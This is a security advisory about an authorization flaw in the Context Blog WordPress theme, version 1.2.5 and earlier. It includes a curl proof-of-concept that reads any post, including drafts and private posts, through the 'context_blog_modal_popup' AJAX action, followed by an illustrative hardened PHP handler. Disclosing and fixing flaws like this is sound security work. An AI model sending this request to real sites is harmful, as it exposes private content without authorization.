Context Blog Theme <= 1.2.5 Vulnerability

Context Blog Theme <= v1.2.5 Unauthorized Access Vulnerability

WordPress Theme Repository URL: https://wordpress.org/themes/context-blog/

Theme Homepage: https://www.postmagthemes.com/downloads/context-blog-free-wordpress-theme/

Theme Author: postmagthemes https://wordpress.org/themes/author/postmagthemes/

Discovered by: Jason Carle hello@jasoncarle.com

Date: 16/09/2025

VULNERABILITY

Unauthorized Access

The Context Blog WordPress theme contains a missing authorization vulnerability in the AJAX handler 'context_blog_modal_popup' (inc/ajax/modal-popup.php).

The vulnerability allows unauthenticated remote attackers to retrieve the content of any post (or page or any post type) by sending a POST request to wp-admin/admin-ajax.php with the action parameter set to 'context_blog_modal_popup' and a postID parameter. This can lead to unauthorized disclosure of potentially sensitive, draft or private post content.

Any attacker can send a POST request to /wp-admin/admin-ajax.php with:

{
    action: 'context_blog_modal_popup',
    postID: [any_post_id]
}

Proof of concept

curl -X POST https://%DOMAIN%/wp-admin/admin-ajax.php \
 -H "Content-Type: application/x-www-form-urlencoded" \
 -d "action=context_blog_modal_popup&postID=1" -v

Result: [screenshot]

POST using RapidAPI: [screenshot]
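
The missing authorization check described above, shown as an added hardening example; it is not the theme's code and not a patch from its author. The callback name `example_modal_popup_handler` and the JSON response shape are assumptions, and the callback is written as a replacement for the theme's handler on the two admin-ajax hooks for this action.

```php
<?php
// Added example: hardened handler sketch. The function name is hypothetical;
// the theme's real code in inc/ajax/modal-popup.php is not shown on this page.

function example_modal_popup_handler() {
    // Read and normalise the post ID from the request body.
    $post_id = isset( $_POST['postID'] ) ? absint( wp_unslash( $_POST['postID'] ) ) : 0;
    $post    = $post_id ? get_post( $post_id ) : null;

    // One generic error for "missing" and "not allowed", so responses
    // do not reveal which IDs exist. wp_send_json_error() ends the request.
    $deny = array( 'message' => 'Not available.' );

    if ( ! $post instanceof WP_Post ) {
        wp_send_json_error( $deny, 404 );
    }

    // Public path: post status and post type are both publicly viewable.
    $public = is_post_publicly_viewable( $post );

    // Private path: a logged-in user who passes the per-post capability
    // check (covers drafts, private posts and non-public post types).
    $privileged = is_user_logged_in() && current_user_can( 'read_post', $post->ID );

    if ( ! $public && ! $privileged ) {
        wp_send_json_error( $deny, 404 );
    }

    // Password-protected posts: no content without the password cookie.
    if ( post_password_required( $post ) ) {
        wp_send_json_error( $deny, 404 );
    }

    // Response shape is an assumption made for this example.
    wp_send_json_success(
        array(
            'title'   => get_the_title( $post ),
            'content' => apply_filters( 'the_content', $post->post_content ),
        )
    );
}

// The handler stays reachable for visitors, since the modal is a front-end
// feature; the checks above decide what each caller may read.
add_action( 'wp_ajax_context_blog_modal_popup', 'example_modal_popup_handler' );
add_action( 'wp_ajax_nopriv_context_blog_modal_popup', 'example_modal_popup_handler' );
```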
